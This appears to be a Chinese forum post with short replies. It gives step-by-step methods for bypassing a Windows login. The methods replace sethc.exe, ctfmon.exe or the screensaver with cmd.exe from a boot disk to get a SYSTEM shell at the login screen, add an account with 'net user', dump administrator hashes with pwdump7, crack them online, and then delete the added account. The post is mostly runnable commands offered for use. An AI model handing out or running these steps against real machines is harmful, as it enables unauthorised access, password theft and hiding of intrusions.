方案2:
如果能在开机进去DOS的话（光盘进入DOS或系统启动项里面的GHOST还原带DOS工具），先进去系统，在输入密码的启动界面按CTRL+ALT+DEL组合键，会进入另一个输入密码的界面，然后狂按Shift键，如果能弹出一个小窗口，粘贴板程序的话，OK，现在能利用该方案了，重启进入到DOS,输入下面命令:
首先备份该程序
copy c:\windows\system32\sethc.exe c:\windows\sethc.bak
然后用CMD程序替换
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
然后重启进入系统，按CTRL+ALT+DEL组合键进入刚才的界面，狂按Shift键，弹出一个黑色的命令行窗口，现在拥有系统最高的权限，执行任意命令都可以，如添加用户
net user test test123 /add
然后重启，就可以用test用户，密码test123进入系统了
删除用户的命令
net user test /del
######


方案3:
如果狂按Shift后没弹出那个小窗口怎么办？还有一个利用的方法，输入法程序替换法，还是开机进入DOS
首先备份输入法程序
copy c:\windows\system32\ctfmon.exe c:\windows\ctfmon.bak
copy c:\windows\system32\cmd.exe c:\windows\system32\ctfmon.exe
然后重启进入到操作系统，一般情况下会自动弹出命令行窗口，如果没弹出可以按CTRL+ALT+DEL组合键试试
不过要记住的是，执行完自己需要的命令后，重启的时候需要把输入法还原回来，命令
copy c:\windows\ctfmon.bak c:\windows\system32\ctfmon.exe
######


方案4:
屏保程序利用，几率50%，首先在进入系统，在密码输入界面出来后就放着不管，等3-4分钟，看是否会出现屏保界面，如果能出现就可以利用了，同样照上面方法替换c:\windows\system32\logon.scr文件

另一种方法：
光驱启动，
进pe，
替换sethc，
重启，
硬盘启动，
5下shift得到一个cmd shell，
加管理员。
登陆。
用pwdump7抓管理员哈希。
然后去http://www.objectif-securite.ch/products.php 破解。
14位以下的密码秒破。
除了安全意识非常非常好的人，
一般也不会有人把密码设置的很复杂。
登陆administrator，
进dos删掉你刚才加的账号。


捣乱的,封3天

厉害